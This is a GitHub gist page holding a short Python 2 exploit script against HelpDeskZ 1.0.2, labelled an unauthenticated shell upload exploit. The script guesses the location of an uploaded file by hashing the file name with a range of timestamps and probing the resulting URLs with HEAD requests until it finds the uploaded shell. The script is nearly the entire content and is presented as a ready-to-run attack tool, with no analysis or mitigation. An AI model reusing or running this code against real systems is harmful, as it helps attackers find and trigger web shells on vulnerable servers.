Skip to content

Instantly share code, notes, and snippets.

@DoMINAToR98

DoMINAToR98/exploit.py

Created June 10, 2019 10:40
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save DoMINAToR98/0e1ae23aefaf05f32a0cbfb520248291 to your computer and use it in GitHub Desktop.
Save DoMINAToR98/0e1ae23aefaf05f32a0cbfb520248291 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
exploit.py
import hashlib
import time
import sys
import requests
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
if len(sys.argv) < 4:
print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
sys.exit(1)
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
extension = sys.argv[3]
date_time = '22.01.2019 13:49:19'
pattern = '%d.%m.%Y %H:%M:%S'
epochTime = int(time.mktime(time.strptime(date_time, pattern)))
#currentTime = int(time.time())
currentTime = epochTime+70
print currentTime
for x in range(0, 500):
plaintext = fileName + str(currentTime - x)
md5hash = hashlib.md5(plaintext).hexdigest()
url = helpdeskzBaseUrl+md5hash+extension
response = requests.head(url)
print 'looking for '+url
if response.status_code == 200:
print "found!"
print url
sys.exit(0)
print "Sorry, I did not find anything"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment